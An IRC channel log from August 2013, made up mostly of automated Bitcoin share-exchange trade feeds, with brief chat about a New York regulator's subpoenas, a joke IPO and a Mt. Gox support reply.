[BTCTC] [DMS.SELLING] 50 @ 0.0245 = 1.225 BTC [-] Aug 13 02:38:16 [BTCTC] [LABCOIN] 3222 @ 0.001652 = 5.3227 BTC [+] Aug 13 02:45:35 [BTCTC] [ACTIVEMINING] 18 @ 0.005722 = 0.103 BTC [-] Aug 13 02:48:17 [BTCTC] [TAT.ASICMINER] 3 @ 0.04 = 0.12 BTC [-] Aug 13 02:48:37 [BTCTC] [DMS.SELLING] 104 @ 0.02498 = 2.5979 BTC [+] Aug 13 02:48:38 [BTCTC] [DMS.SELLING] 500 @ 0.02499 = 12.495 BTC [+] Aug 13 02:49:42 [BTCTC] [DMS.SELLING] 1 @ 0.02499 BTC [+] Aug 13 02:49:57 [BTCTC] [COGNITIVE] 4 @ 0.4347 = 1.7388 BTC [-] Aug 13 02:49:57 [BTCTC] [DMS.MINING] 1 @ 0.0035 BTC [+] Aug 13 02:50:16 [BTCTC] [COGNITIVE] 1 @ 0.4347 BTC [-] Aug 13 02:50:17 [BTCTC] [DMS.PURCHASE] 1 @ 0.02801 BTC [-] Aug 13 02:50:19 [BTCTC] [LABCOIN] 30 @ 0.001699 = 0.051 BTC [+] Aug 13 02:50:20 [BTCTC] [COGNITIVE] 2 @ 0.435 = 0.87 BTC [+] Aug 13 02:50:21 [BTCTC] [LABCOIN] 50 @ 0.0017 = 0.085 BTC [+] Aug 13 02:50:22 [BTCTC] [COGNITIVE] 2 @ 0.4388 = 0.8776 BTC [+] Aug 13 02:50:23 [BTCTC] [LABCOIN] 20 @ 0.001743 = 0.0349 BTC [+] Aug 13 02:50:24 [BTCTC] [COGNITIVE] 5 @ 0.439 = 2.195 BTC [+] Aug 13 02:50:25 [BTCTC] [LABCOIN] 100 @ 0.001757 = 0.1757 BTC [+] Aug 13 02:50:25 [BTCTC] [COGNITIVE] 4 @ 0.44 = 1.76 BTC [+] Aug 13 02:50:26 [BTCTC] [LABCOIN] 90 @ 0.001759 = 0.1583 BTC [+] Aug 13 02:50:27 [BTCTC] [COGNITIVE] 2 @ 0.4435 = 0.887 BTC [+] Aug 13 02:50:28 [BTCTC] [LABCOIN] 727 @ 0.00176 = 1.2795 BTC [+] Aug 13 02:50:29 [BTCTC] [COGNITIVE] 3 @ 0.4438 = 1.3314 BTC [+] Aug 13 02:50:30 [BTCTC] [LABCOIN] 12 @ 0.001804 = 0.0216 BTC [+] Aug 13 02:50:31 [BTCTC] [COGNITIVE] 3 @ 0.448 = 1.344 BTC [+] Aug 13 02:50:32 [BTCTC] [LABCOIN] 100 @ 0.001805 = 0.1805 BTC [+] Aug 13 02:50:33 [BTCTC] [COGNITIVE] 6 @ 0.45 = 2.7 BTC [+] Aug 13 02:50:34 [BTCTC] [LABCOIN] 4 @ 0.001816 = 0.0073 BTC [+] Aug 13 02:50:34 [BTCTC] [COGNITIVE] 1 @ 0.455 BTC [+] Aug 13 02:50:35 [BTCTC] [LABCOIN] 39 @ 0.001817 = 0.0709 BTC [+] Aug 13 02:50:37 [BTCTC] [LABCOIN] 123 @ 0.001826 = 0.2246 BTC [+] Aug 13 02:50:38 [BTCTC] [LABCOIN] 485 @ 0.001827 = 0.8861 BTC [+] Aug 13 02:50:39 [BTCTC] [LABCOIN] 500 @ 0.001828 = 0.914 BTC [+] Aug 13 02:50:40 [BTCTC] [LABCOIN] 25 @ 0.001829 = 0.0457 BTC [+] Aug 13 02:50:41 [BTCTC] [LABCOIN] 50 @ 0.00183 = 0.0915 BTC [+] Aug 13 02:50:42 [BTCTC] [LABCOIN] 50 @ 0.00183 = 0.0915 BTC [+] Aug 13 02:50:43 [BTCTC] [LABCOIN] 100 @ 0.00183 = 0.183 BTC [+] Aug 13 02:50:44 [BTCTC] [LABCOIN] 531 @ 0.001831 = 0.9723 BTC [+] Aug 13 02:50:45 [BTCTC] [LABCOIN] 4250 @ 0.001832 = 7.786 BTC [+] Aug 13 02:50:45 [BTCTC] [LABCOIN] 246 @ 0.001834 = 0.4512 BTC [+] Aug 13 02:50:46 [BTCTC] [LABCOIN] 1969 @ 0.001835 = 3.6131 BTC [+] Aug 13 02:50:47 [BTCTC] [LABCOIN] 26 @ 0.001843 = 0.0479 BTC [+] Aug 13 02:50:48 [BTCTC] [LABCOIN] 160 @ 0.001844 = 0.295 BTC [+] Aug 13 02:50:49 [BTCTC] [LABCOIN] 50 @ 0.001844 = 0.0922 BTC [+] Aug 13 02:50:50 [BTCTC] [LABCOIN] 125 @ 0.001849 = 0.2311 BTC [+] Aug 13 02:50:51 [BTCTC] [LABCOIN] 1000 @ 0.00185 = 1.85 BTC [+] Aug 13 02:50:52 [BTCTC] [LABCOIN] 371 @ 0.001852 = 0.6871 BTC [+] Aug 13 02:50:53 [BTCTC] [LABCOIN] 2970 @ 0.001853 = 5.5034 BTC [+] Aug 13 02:50:54 [BTCTC] [LABCOIN] 45 @ 0.001857 = 0.0836 BTC [+] Aug 13 02:50:55 [BTCTC] [LABCOIN] 160 @ 0.001858 = 0.2973 BTC [+] Aug 13 02:50:56 [BTCTC] [LABCOIN] 200 @ 0.001858 = 0.3716 BTC [+] Aug 13 02:50:57 [BTCTC] [LABCOIN] 625 @ 0.001864 = 1.165 BTC [+] Aug 13 02:50:58 [BTCTC] [LABCOIN] 5000 @ 0.001865 = 9.325 BTC [+] Aug 13 02:50:59 [BTCTC] [LABCOIN] 153 @ 0.001868 = 0.2858 BTC [+] Aug 13 02:51:00 [BTCTC] [LABCOIN] 100 @ 0.001869 = 0.1869 BTC [+] Aug 13 02:51:01 [BTCTC] [LABCOIN] 700 @ 0.001869 = 1.3083 BTC [+] Aug 13 02:51:02 [BTCTC] [LABCOIN] 25 @ 0.00187 = 0.0468 BTC [+] Aug 13 02:51:03 [BTCTC] [LABCOIN] 400 @ 0.00187 = 0.748 BTC [+] Aug 13 02:51:04 [BTCTC] [LABCOIN] 18 @ 0.001873 = 0.0337 BTC [+] Aug 13 02:51:05 [BTCTC] [LABCOIN] 50 @ 0.001874 = 0.0937 BTC [+] Aug 13 02:51:06 [BTCTC] [LABCOIN] 100 @ 0.001874 = 0.1874 BTC [+] Aug 13 02:51:07 [BTCTC] [LABCOIN] 10000 @ 0.001878 = 18.78 BTC [+] Aug 13 02:51:08 [BTCTC] [LABCOIN] 80 @ 0.001879 = 0.1503 BTC [+] Aug 13 02:51:09 [BTCTC] [LABCOIN] 6578 @ 0.001879 = 12.3601 BTC [+] Aug 13 02:51:10 [BTCTC] [LABCOIN] 5042 @ 0.00188 = 9.479 BTC [+] Aug 13 02:51:11 [BTCTC] [LABCOIN] 500 @ 0.00188 = 0.94 BTC [+] Aug 13 02:51:12 [BTCTC] [LABCOIN] 550 @ 0.001885 = 1.0368 BTC [+] Aug 13 02:51:13 [BTCTC] [LABCOIN] 140 @ 0.001886 = 0.264 BTC [+] Aug 13 02:51:14 [BTCTC] [LABCOIN] 100 @ 0.001886 = 0.1886 BTC [+] Aug 13 02:51:15 [BTCTC] [LABCOIN] 75 @ 0.001886 = 0.1415 BTC [+] Aug 13 02:51:16 [BTCTC] [LABCOIN] 30 @ 0.001896 = 0.0569 BTC [+] Aug 13 02:51:17 [BTCTC] [LABCOIN] 5000 @ 0.001896 = 9.48 BTC [+] Aug 13 02:51:18 [BTCTC] [LABCOIN] 126 @ 0.001897 = 0.239 BTC [+] Aug 13 02:51:19 [BTCTC] [DMS.SELLING] 5 @ 0.02499 = 0.125 BTC [+] Aug 13 02:51:20 [BTCTC] [DMS.PURCHASE] 5 @ 0.02801 = 0.1401 BTC [-] Aug 13 02:51:21 [BTCTC] [DMS.PURCHASE] 71 @ 0.02801 = 1.9887 BTC [-] Aug 13 02:51:51 [BTCTC] [DMS.PURCHASE] 4 @ 0.02801 = 0.112 BTC [-] Aug 13 02:53:55 [BTCTC] [DMS.PURCHASE] 505 @ 0.02801 = 14.1451 BTC [-] Aug 13 02:54:37 [BTCTC] [TAT.ASICMINER] 10 @ 0.04 = 0.4 BTC [-] Aug 13 02:54:46 [BTCTC] [LABCOIN] 30 @ 0.001691 = 0.0507 BTC [-] Aug 13 02:54:47 [BTCTC] [LABCOIN] 1 @ 0.001692 BTC [+] Aug 13 02:54:48 [BTCTC] [LABCOIN] 1 @ 0.001695 BTC [+] Aug 13 02:54:50 [BTCTC] [LABCOIN] 20 @ 0.001696 = 0.0339 BTC [+] Aug 13 02:54:51 [BTCTC] [LABCOIN] 1080 @ 0.001896 = 2.0477 BTC [+] Aug 13 02:54:51 [BTCTC] [LABCOIN] 3384 @ 0.001897 = 6.4194 BTC [+] Aug 13 02:56:03 [BTCTC] [LABCOIN] 30 @ 0.001896 = 0.0569 BTC [-] Aug 13 02:56:18 [BTCTC] [NASTY-PT] 57 @ 0.00445 = 0.2537 BTC [-] Aug 13 02:57:31 [BTCTC] [ACTIVEMINING] 30 @ 0.005722 = 0.1717 BTC [-] Aug 13 02:57:33 [BTCTC] [ACTIVEMINING] 68 @ 0.005721 = 0.389 BTC [-] Aug 13 02:57:34 [BTCTC] [ACTIVEMINING] 4 @ 0.005715 = 0.0229 BTC [-] Aug 13 02:57:35 [BTCTC] [ACTIVEMINING] 255 @ 0.00571 = 1.4561 BTC [-] Aug 13 02:57:37 [BTCTC] [ACTIVEMINING] 25 @ 0.00571 = 0.1428 BTC [-] Aug 13 02:57:38 [BTCTC] [ACTIVEMINING] 138 @ 0.005705 = 0.7873 BTC [-] Aug 13 02:58:22 [BTCTC] [LABCOIN] 2 @ 0.001897 = 0.0038 BTC [+] Aug 13 02:58:50 [BTCTC] [LABCOIN] 180 @ 0.001896 = 0.3413 BTC [-] Aug 13 02:59:01 [BTCTC] [LABCOIN] 1488 @ 0.001897 = 2.8227 BTC [+] Aug 13 02:59:01 [BTCTC] [LABCOIN] 12 @ 0.001897 = 0.0228 BTC [+] Aug 13 03:02:47 [BTCTC] [ACTIVEMINING] 30 @ 0.005799 = 0.174 BTC [+] Aug 13 03:02:48 [BTCTC] [ACTIVEMINING] 3 @ 0.0058 = 0.0174 BTC [+] Aug 13 03:03:16 [BTCTC] [TAT.ASICMINER] 2 @ 0.04013 = 0.0803 BTC [+] Aug 13 03:03:31 [BTCTC] [KENILWORTH] 2 @ 0.0018 = 0.0036 BTC [+] Aug 13 03:04:30 [BTCTC] [DMS.PURCHASE] 125 @ 0.02801 = 3.5013 BTC [-] Aug 13 03:04:41 [HAVELOCK] [CFIG] 2 @ 0.15 = 0.3 BTC Aug 13 03:05:19 [BTCTC] [LABCOIN] 30 @ 0.001701 = 0.051 BTC [-] Aug 13 03:05:20 [BTCTC] [LABCOIN] 100 @ 0.0017 = 0.17 BTC [-] Aug 13 03:05:22 [BTCTC] [LABCOIN] 3 @ 0.001685 = 0.0051 BTC [-] Aug 13 03:05:23 [BTCTC] [LABCOIN] 1628 @ 0.001685 = 2.7432 BTC [-] Aug 13 03:05:23 [BTCTC] [LABCOIN] 278 @ 0.001684 = 0.4682 BTC [-] Aug 13 03:05:24 [BTCTC] [LABCOIN] 20 @ 0.00168 = 0.0336 BTC [-] Aug 13 03:05:25 [BTCTC] [LABCOIN] 135 @ 0.00164 = 0.2214 BTC [-] Aug 13 03:05:26 [BTCTC] [LABCOIN] 75 @ 0.001639 = 0.1229 BTC [-] Aug 13 03:05:28 [BTCTC] [LABCOIN] 500 @ 0.001639 = 0.8195 BTC [-] Aug 13 03:05:29 [BTCTC] [LABCOIN] 165 @ 0.001638 = 0.2703 BTC [-] Aug 13 03:05:30 [BTCTC] [LABCOIN] 330 @ 0.001638 = 0.5405 BTC [-] Aug 13 03:05:31 [BTCTC] [LABCOIN] 15 @ 0.001638 = 0.0246 BTC [-] Aug 13 03:05:32 [BTCTC] [LABCOIN] 910 @ 0.001637 = 1.4897 BTC [-] Aug 13 03:05:33 [BTCTC] [LABCOIN] 5811 @ 0.001636 = 9.5068 BTC [-] Aug 13 03:05:41 [BTCTC] [CB.IDIFF-O] 100 @ 0.0095 = 0.95 BTC [+] Aug 13 03:06:05 [BTCTC] [DMS.MINING] 5 @ 0.003414 = 0.0171 BTC [-] Aug 13 03:07:20 http://www.forbes.com/sites/kashmirhill/2013/08/12/every-important-person-in-bitcoin-just-got-subpoenaed-by-new-yorks-financial-regulator/ Aug 13 03:07:23 Every Important Person In Bitcoin Just Got Subpoenaed By New York's Financial Regulator - Forbes Aug 13 03:07:37 it's official, none of us are important Aug 13 03:08:43 if i had a hamster, i would be an important person in my hamster's life Aug 13 03:08:47 err Aug 13 03:08:51 n/m :p Aug 13 03:09:25 [BTCTC] [DMS.MINING] 31 @ 0.003414 = 0.1058 BTC [-] Aug 13 03:09:26 [BTCTC] [DMS.MINING] 94 @ 0.003413 = 0.3208 BTC [-] Aug 13 03:09:32 forget it.. Aug 13 03:09:41 thought it would be busier here by now.. Aug 13 03:11:17 [HAVELOCK] [HIM] 4 @ 0.16899 = 0.676 BTC [-] Aug 13 03:12:21 lol "some important us based bitcoin businesses" would be more accurate :P Aug 13 03:12:30 dont see gavin on the list - he'd be a pretty important btc person i think ;) Aug 13 03:13:21 [HAVELOCK] [HIM] 4 @ 0.16899 = 0.676 BTC [-] **** BEGIN LOGGING AT Tue Aug 13 11:20:44 2013 Aug 13 11:21:29 ThickAsThieves lol "important" Aug 13 11:22:39 [BTCTC] [LABCOIN] 30 @ 0.001712 = 0.0514 BTC [+] Aug 13 11:22:41 [BTCTC] [LABCOIN] 30 @ 0.001711 = 0.0513 BTC [-] Aug 13 11:22:41 [BTCTC] [LABCOIN] 4970 @ 0.00171 = 8.4987 BTC [-] Aug 13 11:24:10 [BTCTC] [LABCOIN] 1 @ 0.001731 BTC [+] Aug 13 11:26:48 kakobrekla https://bitcointalk.org/index.php?topic=272704.msg2922509#msg2922509 Aug 13 11:27:03 tl;dr mnw now @bitstamp Aug 13 11:29:08 [BTCTC] [LABCOIN] 30 @ 0.00171 = 0.0513 BTC [-] Aug 13 11:29:09 [BTCTC] [LABCOIN] 157 @ 0.001703 = 0.2674 BTC [-] Aug 13 11:29:11 [BTCTC] [LABCOIN] 50 @ 0.001703 = 0.0852 BTC [-] Aug 13 11:29:12 [BTCTC] [LABCOIN] 20000 @ 0.001702 = 34.04 BTC [-] Aug 13 11:29:13 [BTCTC] [LABCOIN] 80 @ 0.0017 = 0.136 BTC [-] Aug 13 11:29:14 [BTCTC] [LABCOIN] 24143 @ 0.0017 = 41.0431 BTC [-] Aug 13 11:30:05 hey mircea Aug 13 11:30:14 [BTCTC] [LABCOIN] 50 @ 0.00171 = 0.0855 BTC [+] Aug 13 11:30:16 [BTCTC] [LABCOIN] 3857 @ 0.0017 = 6.5569 BTC [-] Aug 13 11:30:17 [BTCTC] [LABCOIN] 900 @ 0.0017 = 1.53 BTC [-] Aug 13 11:30:19 [BTCTC] [LABCOIN] 1993 @ 0.0017 = 3.3881 BTC [-] Aug 13 11:31:12 VanCleef ello Aug 13 11:31:53 :) Huge spike of intrest in Amethyst today. Aug 13 11:32:06 [BTCTC] [LABCOIN] 7 @ 0.0017 = 0.0119 BTC [-] Aug 13 11:32:09 hahaha link ? Aug 13 11:32:17 https://bitcointalk.org/index.php?topic=263684.20 Aug 13 11:32:22 Amethyst - IPO finished, shares now trading at 2btc each, WE'RE OFF TO THE SUN Aug 13 11:32:36 i cant stop laughing hey, the best part is, i'm even getting pm's asking where they can buy shares Aug 13 11:33:21 [BTCTC] [LABCOIN] 500 @ 0.001675 = 0.8375 BTC [-] Aug 13 11:33:52 [BTCTC] [TAT.ASICMINER] 65 @ 0.0418 = 2.717 BTC [+] Aug 13 11:34:04 jesus fuck you gotta be kidding me Aug 13 11:34:36 then "respectable" folk like gmaxwell discuss "my" channel of "sycophants". totally, dude. we're all sycophants over here. Aug 13 11:34:47 they're all smrt over there. Aug 13 11:35:35 [MPEX] [S.MPOE] 1663 @ 0.00082968 = 1.3798 BTC [-] Aug 13 11:35:49 [BTCTC] [LABCOIN] 25 @ 0.001655 = 0.0414 BTC [-] Aug 13 11:35:50 [BTCTC] [LABCOIN] 975 @ 0.001653 = 1.6117 BTC [-] Aug 13 11:36:55 [BTCTC] [DMS.MINING] 20 @ 0.003746 = 0.0749 BTC [+] Aug 13 11:37:54 [BTCTC] [DMS.SELLING] 44 @ 0.02498 = 1.0991 BTC [-] Aug 13 11:37:55 [BTCTC] [DMS.SELLING] 156 @ 0.02499 = 3.8984 BTC [+] Aug 13 11:38:11 [BTCTC] [LABCOIN] 14 @ 0.001653 = 0.0231 BTC [-] Aug 13 11:38:43 [BTCTC] [LABCOIN] 12 @ 0.001654 = 0.0198 BTC [+] Aug 13 11:38:45 [BTCTC] [LABCOIN] 89 @ 0.001655 = 0.1473 BTC [+] Aug 13 11:39:04 [BTCTC] [DMS.SELLING] 76 @ 0.02499 = 1.8992 BTC [+] Aug 13 11:39:12 [BTCTC] [LABCOIN] 12 @ 0.001655 = 0.0199 BTC [+] Aug 13 11:40:10 latest gox support gem Aug 13 11:40:13 "As advised earlier developer do not communicate with users directly and they do not have email access and probably they are not even good at language so that is why we are there here to communicate issues to them." Aug 13 11:41:44 [BTCTC] [LABCOIN] 15 @ 0.001657 = 0.0249 BTC [+] Aug 13 11:45:40 probably they are not even good at language Aug 13 11:45:40 [BTCTC] [LABCOIN] 4 @ 0.00166 = 0.0066 BTC [+] Aug 13 11:45:41 [BTCTC] [LABCOIN] 38 @ 0.001661 = 0.0631 BTC [+] Aug 13 11:46:03 [BTCTC] [LABCOIN] 1 @ 0.001676 BTC [+] Aug 13 11:46:04 [BTCTC] [LABCOIN] 12 @ 0.00168 = 0.0202 BTC [+] Aug 13 11:46:05 [BTCTC] [LABCOIN] 100 @ 0.001681 = 0.1681 BTC [+] Aug 13 11:46:34 lmao Aug 13 11:46:37 [BTCTC] [LABCOIN] 30 @ 0.001701 = 0.051 BTC [+] Aug 13 11:46:38 [BTCTC] [LABCOIN] 3 @ 0.001702 = 0.0051 BTC [+] Aug 13 11:46:40 [BTCTC] [LABCOIN] 1 @ 0.001704 BTC [+] Aug 13 11:46:41 [BTCTC] [LABCOIN] 25 @ 0.001705 = 0.0426 BTC [+] Aug 13 11:46:42 [BTCTC] [LABCOIN] 15 @ 0.001714 = 0.0257 BTC [+] Aug 13 11:46:42 [BTCTC] [LABCOIN] 120 @ 0.001715 = 0.2058 BTC [+] Aug 13 11:46:43 [BTCTC] [LABCOIN] 158 @ 0.001735 = 0.2741 BTC [+] Aug 13 11:46:50 [HAVELOCK] [HIM] 1 @ 0.1975 BTC [-] Aug 13 11:46:51 at first i was all "wtf new asic miner scam is this" Aug 13 11:46:56 then i read gox. Aug 13 11:47:01 then i shook my head. Aug 13 11:47:08 [BTCTC] [DMS.SELLING] 2 @ 0.02462 = 0.0492 BTC [-] Aug 13 11:47:18 [BTCTC] [LABCOIN] 12 @ 0.001687 = 0.0202 BTC [-] Aug 13 11:47:18 [BTCTC] [LABCOIN] 1 @ 0.001735 BTC [+] Aug 13 11:48:10 [BTCTC] [LABCOIN] 30 @ 0.001735 = 0.0521 BTC [+] Aug 13 11:48:12 [BTCTC] [LABCOIN] 1245 @ 0.001736 = 2.1613 BTC [+] Aug 13 11:48:55 [BTCTC] [LABCOIN] 30 @ 0.001733 = 0.052 BTC [-] Aug 13 11:48:56 [BTCTC] [LABCOIN] 81 @ 0.001734 = 0.1405 BTC [+] Aug 13 11:48:57 [BTCTC] [LABCOIN] 30 @ 0.001736 = 0.0521 BTC [+] Aug 13 11:49:56 [HAVELOCK] [HIM] 24 @ 0.198 = 4.752 BTC [+] Aug 13 11:53:46 [BTCTC] [DMS.MINING] 20 @ 0.003457 = 0.0691 BTC [-] Aug 13 11:53:46 [BTCTC] [DMS.MINING] 28 @ 0.003456 = 0.0968 BTC [-] Aug 13 11:54:50 [BTCTC] [DMS.MINING] 25 @ 0.003457 = 0.0864 BTC [+] Aug 13 11:54:52 [BTCTC] [DMS.MINING] 117 @ 0.003456 = 0.4044 BTC [-] Aug 13 11:54:53 [BTCTC] [DMS.MINING] 21 @ 0.003446 = 0.0724 BTC [-] Aug 13 11:55:29 [BTCTC] [DMS.PURCHASE] 235 @ 0.02801 = 6.5824 BTC [+] Aug 13 11:55:53 [BTCTC] [LABCOIN] 35 @ 0.001718 = 0.0601 BTC [-] Aug 13 11:58:05 ;;echo .d Aug 13 11:58:05 .d Aug 13 11:58:06 37392766.13647 | Next Diff in 85 blocks | Estimated Change: 35.1940% in 0d 9h 5m 42s Aug 13 11:58:15 [BTCTC] [COG.F2] 1 @ 5 BTC Aug 13 11:58:31 [BTCTC] [LABCOIN] 1 @ 0.001717 BTC [-] Aug 13 11:58:44 [BTCTC] [COG.F2] 4 @ 5 = 20 BTC Aug 13 12:03:54 [BTCTC] [LABCOIN] 3 @ 0.001717 = 0.0052 BTC [-] Aug 13 12:03:55 [BTCTC] [LABCOIN] 27 @ 0.001718 = 0.0464 BTC [+] Aug 13 12:03:57 [BTCTC] [LABCOIN] 1 @ 0.00173 BTC [+] Aug 13 12:03:58 [BTCTC] [LABCOIN] 10 @ 0.001731 = 0.0173 BTC [+] Aug 13 12:03:58 [BTCTC] [LABCOIN] 16 @ 0.001744 = 0.0279 BTC [+] Aug 13 12:04:00 [HAVELOCK] [AM100] 5 @ 0.0385 = 0.1925 BTC [+] Aug 13 12:04:15 [BTCTC] [DMS.MINING] 20 @ 0.003747 = 0.0749 BTC [+] Aug 13 12:04:16 [BTCTC] [DMS.MINING] 110 @ 0.003748 = 0.4123 BTC [+] Aug 13 12:06:30 [BTCTC] [CB.IDIFF-O] 25 @ 0.0095 = 0.2375 BTC [+] Aug 13 12:08:08 [BTCTC] [DMS.SELLING] 110 @ 0.02462 = 2.7082 BTC [-] Aug 13 12:08:59 [BTCTC] [DMS.PURCHASE] 111 @ 0.02801 = 3.1091 BTC [+] Aug 13 12:09:42 [BTCTC] [COG.F2] 10 @ 5 = 50 BTC Aug 13 12:11:18 [BTCTC] [LABCOIN] 30 @ 0.001735 = 0.0521 BTC [-] Aug 13 12:11:51 [BTCTC] [TAT.VIRTUALMINE] 3 @ 0.001188 = 0.0036 BTC [-] Aug 13 12:14:45 [BTCTC] [LABCOIN] 6 @ 0.001731 = 0.0104 BTC [-] Aug 13 12:14:47 [BTCTC] [LABCOIN] 20 @ 0.001732 = 0.0346 BTC [+] Aug 13 12:16:04 [BTCTC] [LABCOIN] 4 @ 0.001733 = 0.0069 BTC [+] Aug 13 12:16:05 [BTCTC] [LABCOIN] 50 @ 0.001706 = 0.0853 BTC [-] Aug 13 12:16:06 [BTCTC] [LABCOIN] 101 @ 0.001702 = 0.1719 BTC [-] Aug 13 12:16:07 [BTCTC] [LABCOIN] 100 @ 0.001701 = 0.1701 BTC [-] Aug 13 12:16:08 [BTCTC] [LABCOIN] 3995 @ 0.001701 = 6.7955 BTC [-] Aug 13 12:21:04 [BTCTC] [DMS.MINING] 10 @ 0.003748 = 0.0375 BTC [+] Aug 13 12:21:34 [BTCTC] [LABCOIN] 30 @ 0.001737 = 0.0521 BTC [+] Aug 13 12:22:01 [BTCTC] [ASICMINER-PT] 5 @ 4.2 = 21 BTC [-] Aug 13 12:22:02 [BTCTC] [ASICMINER-PT] 2 @ 4.209 = 8.418 BTC [+] Aug 13 12:22:03 [BTCTC] [ASICMINER-PT] 5 @ 4.21 = 21.05 BTC [+] Aug 13 12:22:05 [BTCTC] [ASICMINER-PT] 2 @ 4.23 = 8.46 BTC [+] Aug 13 12:22:25 [BTCTC] [ASICMINER-PT] 1 @ 4.199 BTC [-] Aug 13 12:23:46 [BTCTC] [TAT.ASICMINER] 10 @ 0.0418 = 0.418 BTC [+] Aug 13 12:25:06 [BTCTC] [LABCOIN] 30 @ 0.001733 = 0.052 BTC [-] Aug 13 12:25:06 [BTCTC] [LABCOIN] 3 @ 0.001734 = 0.0052 BTC [+] Aug 13 12:30:45 [HAVELOCK] [AM100] 67 @ 0.0385 = 2.5795 BTC [+] Aug 13 12:30:55 [HAVELOCK] [AM100] 35 @ 0.039 = 1.365 BTC [+] Aug 13 12:30:58 [HAVELOCK] [AM100] 20 @ 0.039 = 0.78 BTC [+] Aug 13 12:31:09 [BTCTC] [CB.IDIFF-O] 25 @ 0.0095 = 0.2375 BTC [+] Aug 13 12:32:27 [BTCTC] [LABCOIN] 6 @ 0.001735 = 0.0104 BTC [+] Aug 13 12:33:58 [BTCTC] [LABCOIN] 16 @ 0.001744 = 0.0279 BTC [+] Aug 13 12:34:16 [BTCTC] [LABCOIN] 16 @ 0.001744 = 0.0279 BTC [+] Aug 13 12:35:32 [BTCTC] [DMS.PURCHASE] 100 @ 0.02801 = 2.801 BTC [+] Aug 13 12:35:33 [BTCTC] [ACTIVEMINING] 30 @ 0.005802 = 0.1741 BTC [-] Aug 13 12:35:35 [BTCTC] [ACTIVEMINING] 50 @ 0.005801 = 0.2901 BTC [-] Aug 13 12:36:09 [BTCTC] [LABCOIN] 16 @ 0.001744 = 0.0279 BTC [+] Aug 13 12:37:13 [BTCTC] [LABCOIN] 113 @ 0.001744 = 0.1971 BTC [+] Aug 13 12:38:17 [BTCTC] [LABCOIN] 8 @ 0.001744 = 0.014 BTC [+] Aug 13 12:38:29 [BTCTC] [LABCOIN] 231 @ 0.001744 = 0.4029 BTC [+] Aug 13 12:41:29 [BTCTC] [LABCOIN] 8 @ 0.001743 = 0.0139 BTC [-] Aug 13 12:42:10 [BTCTC] [LABCOIN] 7 @ 0.001743 = 0.0122 BTC [-] Aug 13 12:42:12 [BTCTC] [TAT.ASICMINER] 5 @ 0.0418 = 0.209 BTC [+] Aug 13 12:43:07 [BTCTC] [LABCOIN] 30 @ 0.001742 = 0.0523 BTC [-] Aug 13 12:43:08 [BTCTC] [LABCOIN] 1 @ 0.001743 BTC [+] Aug 13 12:43:09 [BTCTC] [LABCOIN] 8 @ 0.001744 = 0.014 BTC [+] Aug 13 12:46:43 [HAVELOCK] [SMG] 1 @ 0.0002093 BTC [+] Aug 13 12:49:37 [BTCTC] [ASICMINER-PT] 1 @ 4.216 BTC [+] Aug 13 12:49:45 [BTCTC] [DMS.MINING] 3 @ 0.003451 = 0.0104 BTC [-] Aug 13 12:50:08 [BTCTC] [DMS.MINING] 30 @ 0.00345 = 0.1035 BTC [-] Aug 13 12:50:43 [BTCTC] [DMS.MINING] 45 @ 0.003447 = 0.1551 BTC [-] Aug 13 12:51:57 [BTCTC] [LABCOIN] 30 @ 0.001713 = 0.0514 BTC [-] Aug 13 12:52:17 [BTCTC] [LABCOIN] 20 @ 0.001713 = 0.0343 BTC [-] Aug 13 12:52:19 [BTCTC] [KENILWORTH] 10 @ 0.001703 = 0.017 BTC [-] Aug 13 12:52:37 [BTCTC] [LABCOIN] 10 @ 0.001714 = 0.0171 BTC [+] Aug 13 12:52:51 [BTCTC] [KENILWORTH] 1 @ 0.001702 BTC [-] Aug 13 12:53:10 [BTCTC] [KENILWORTH] 5 @ 0.0017 = 0.0085 BTC [-] Aug 13 12:53:13 [BTCTC] [LABCOIN] 30 @ 0.001713 = 0.0514 BTC [-] Aug 13 12:53:30 [BTCTC] [KENILWORTH] 7 @ 0.001689 = 0.0118 BTC [-] Aug 13 12:53:32 [BTCTC] [KENILWORTH] 8 @ 0.001689 = 0.0135 BTC [-] Aug 13 12:53:41 [BTCTC] [LABCOIN] 20 @ 0.001713 = 0.0343 BTC [-] Aug 13 12:53:55 [BTCTC] [KENILWORTH] 23 @ 0.001688 = 0.0388 BTC [-] Aug 13 12:55:00 [BTCTC] [DMS.PURCHASE] 49 @ 0.02801 = 1.3725 BTC [+] Aug 13 12:55:18 [BTCTC] [LABCOIN] 20 @ 0.001715 = 0.0343 BTC [+] Aug 13 12:55:50 [BTCTC] [LABCOIN] 10 @ 0.001715 = 0.0172 BTC [+] Aug 13 12:57:27 [BTCTC] [TAT.ASICMINER] 9 @ 0.04071 = 0.3664 BTC [-] Aug 13 12:57:28 [BTCTC] [TAT.ASICMINER] 50 @ 0.0407 = 2.035 BTC [-] Aug 13 12:57:30 [BTCTC] [TAT.ASICMINER] 7 @ 0.04068 = 0.2848 BTC [-] Aug 13 12:57:31 [BTCTC] [TAT.ASICMINER] 14 @ 0.04061 = 0.5685 BTC [-] Aug 13 13:00:09 [BTCTC] [TAT.ASICMINER] 14 @ 0.04179 = 0.5851 BTC [+] Aug 13 13:01:06 [BTCTC] [TAT.ASICMINER] 31 @ 0.0418 = 1.2958 BTC [+] Aug 13 13:01:39 [BTCTC] [ASICMINER-PT] 1 @ 4.217 BTC [+] Aug 13 13:04:33 [MPEX] [S.MPOE] 3337 @ 0.00083 = 2.7697 BTC [+] Aug 13 13:04:35 [MPEX] [S.MPOE] 8728 @ 0.00082785 = 7.2255 BTC [-] Aug 13 13:04:43 [MPEX] [S.MPOE] 11035 @ 0.00082738 = 9.1301 BTC [-] Aug 13 13:05:05 [HAVELOCK] [CFIG] 4 @ 0.15 = 0.6 BTC Aug 13 13:09:33 [BTCTC] [TAT.ASICMINER] 36 @ 0.04063 = 1.4627 BTC [-] Aug 13 13:11:06 [BTCTC] [ASICMINER-PT] 1 @ 4.218 BTC [+] Aug 13 13:13:03 [BTCTC] [TAT.ASICMINER] 1 @ 0.04062 BTC [-] Aug 13 13:13:04 [BTCTC] [TAT.ASICMINER] 24 @ 0.04063 = 0.9751 BTC [+] Aug 13 13:15:20 [BTCTC] [COG.F2] 2 @ 5 = 10 BTC Aug 13 13:16:09 [BTCTC] [DMS.SELLING] 8 @ 0.02463 = 0.197 BTC [+] Aug 13 13:16:35 [BTCTC] [DMS.SELLING] 2 @ 0.02462 = 0.0492 BTC [-] Aug 13 13:17:07 [BTCTC] [DMS.PURCHASE] 10 @ 0.02801 = 0.2801 BTC [+] Aug 13 13:17:39 [BTCTC] [TAT.ASICMINER] 27 @ 0.04062 = 1.0967 